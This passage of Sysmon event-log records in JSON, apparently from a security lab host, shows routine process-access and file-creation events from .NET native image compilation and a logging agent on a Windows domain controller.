07:00:51.496","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-0010E0EB0A00}","TargetProcessId":"4512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7333,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.496\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-0010E0EB0A00}\r\nTargetProcessId: 4512\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.496","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-0010E0EB0A00}","TargetProcessId":"4512","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7334,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:51.574\r\nProcessGuid: {E2A3D6B1-1323-5F25-0000-0010E0EB0A00}\r\nProcessId: 4512\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11a0-0\\Microsoft.GroupPolicy.ServerAdminTools.GPOAdminGrid.dll\r\nCreationUtcTime: 2020-08-01 07:00:51.574","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:51.574","ProcessGuid":"{E2A3D6B1-1323-5F25-0000-0010E0EB0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11a0-0\\Microsoft.GroupPolicy.ServerAdminTools.GPOAdminGrid.dll","CreationUtcTime":"2020-08-01 07:00:51.574","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7335,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.590\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12EA-5F25-0000-0010D84B0A00}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.590","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12EA-5F25-0000-0010D84B0A00}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7336,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.590\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12EA-5F25-0000-0010D84B0A00}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.590","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12EA-5F25-0000-0010D84B0A00}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7337,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.590\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12EA-5F25-0000-0010D84B0A00}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.590","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12EA-5F25-0000-0010D84B0A00}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7338,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7339,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.652\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-00102FF30A00}\r\nTargetProcessId: 3140\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.652","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-00102FF30A00}","TargetProcessId":"3140","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7340,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.652\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-00102FF30A00}\r\nTargetProcessId: 3140\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.652","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-00102FF30A00}","TargetProcessId":"3140","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7341,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.652\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-00102FF30A00}\r\nTargetProcessId: 3140\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 